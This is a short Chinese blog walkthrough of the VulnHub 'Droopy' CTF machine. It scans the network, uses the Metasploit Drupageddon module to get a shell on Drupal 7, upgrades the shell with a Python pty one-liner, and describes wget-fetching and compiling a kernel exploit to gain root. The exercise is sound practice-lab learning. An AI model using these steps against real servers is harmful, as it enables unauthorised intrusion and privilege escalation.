DROOPYCTF WALKTHROUGH
droopyCTF
https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm
CTF镜像合集:https://www.vulnhub.com/?page=18
参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/
1.获取目标ip地址,并进行端口发现,目标只开启了80端口
netdiscover -i eth0 -r 192.168.88.1/24
访问web页面
Drupal 7 应该是一个类似于wordpress的一个开源的框架
searchsploit Drupal 7 搜索相关漏洞
使用 msf 利用 漏洞
use exploit/multi/http/drupal_drupageddon
set rhosts 192.168.88.200
exploit
利用注入漏洞上传payload 获得shell
搜索内核相关漏洞信息
使用 pty 获取完整性shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
开启web,使用 wget 将 漏洞利用代码下载到目标机器
编译.c文件,执行漏洞利用程序,成功获得root权限。
DROOPYCTF WALKTHROUGH相关推荐
- A Complete Machine Learning Walk-Through in Python
A Complete Machine Learning Project Walk-Through in Python: Part One A Complete Machine Learning Pro ...
- OPEN(SAP) UI5 学习入门系列之四:更好的入门系列-官方Walkthrough
好久没有更新了,实在不知道应该写一些什么内容,因为作为入门系列,实际上应该更多的是操作而不是理论,而在UI5 SDK中的EXPLORER里面有着各种控件的用法,所以在这里也没有必要再来一遍,还是看官方 ...
- exif viewer java,1earn/XSS挑战-WalkThrough.md at master · dizhaung/1earn · GitHub
XSS挑战-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 知识点 无过滤 XSS (level 1) 各种难度 ...
- Walkthrough: Word 2007 XML 格式
本页内容 简介 Word 2007 文档包 Word XML格式的开放打包约定 解析Word 2007文件 确定Word 2007文档中的非XML部件 从文档中分离内容 理解数据存储 结论 简介 Mi ...
- hackmyvm-bunny walkthrough
hackmyvm-buny walkthrough 难度(作者评价):difficult 信息收集 PORT STATE SERVICE 22/tcp open ssh 80/tcp open htt ...
- [Hack The Box] HTB—Paper walkthrough
[Hack The Box] HTB-Paper walkthrough HTB-Paper [Hack The Box] HTB-Paper walkthrough 一.信息搜集 X-Backend ...
- HTB walkthrough -- Admirer
HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-d ...
- hackmyvm: kitty walkthrough
hackmyvm: kitty walkthrough 0x01 oracle padding 端口扫描: PORT STATE SERVICE 22/tcp open ssh 80/tcp open ...
- Hackthebox:Silo Walkthrough(not use metasploit)
预备知识 Oracle 数据库渗透:oracle默认端口.odat使用--sid.用户名密码爆破.任意文件上传 JuicyPotato提权 netcat.certutil.nmap 信息收集和获取立足 ...
- iBlog Config WalkThrough ! iBlog 完全配置指南 !
怀旧系列. 最近在GitHub中发现了2017年写的一个博客网站项目(目前已经删除),经过一番修改,终于能跑起来了(目的是做最后的截图留念),长这个样子的: 左边有我的各个社交媒体的主页,虽然都不怎么 ...
最新文章
- OpenCV中SiftDescriptorExtractor
- Mac OS使用技巧之十二:解决APP Store更新、下载出错的问题
- jax-ws cxf_走向REST:在Spring和JAX-RS(Apache CXF)中嵌入Jetty
- 文件下载时,文件名乱码问题
- 网络压缩《网络压缩论文整理》
- stm32编码器正反转计数程序_第六章:STM32CubeMx 定时器编码器模式基本使用方法...
- Android ProgressDialog示例
- SQL中FOR XML子句的各种用法,包括FOR XML字句的四种基本模式:AUTO模式、RAW模式、PATH模式和EXPLICIT模式...
- Android Architecture Components 系列(五)Room
- 身份证前6位地区编码sql
- 使用jsoup爬虫超时分析与处理
- ASCALL码表对照表 最全、最成体系表格 与对比
- Arduino - 连接RS232串口设备(通过RS232转TTL转接口)
- linux下oracle登陆建表,Oracle建表过程初学
- 软件自动化测试的学习路线
- eclipse保存文件出现save could not be completed. Try File Save As..
- 啦啦啦啦啦啦啦啦啦啦啦啦
- 如何设置计算机网络ip地址,图文解说如何设置IP地址
- 面试,这些问题一定要问清楚!
- 递归查询Sdcarad文件中的音乐,图片类同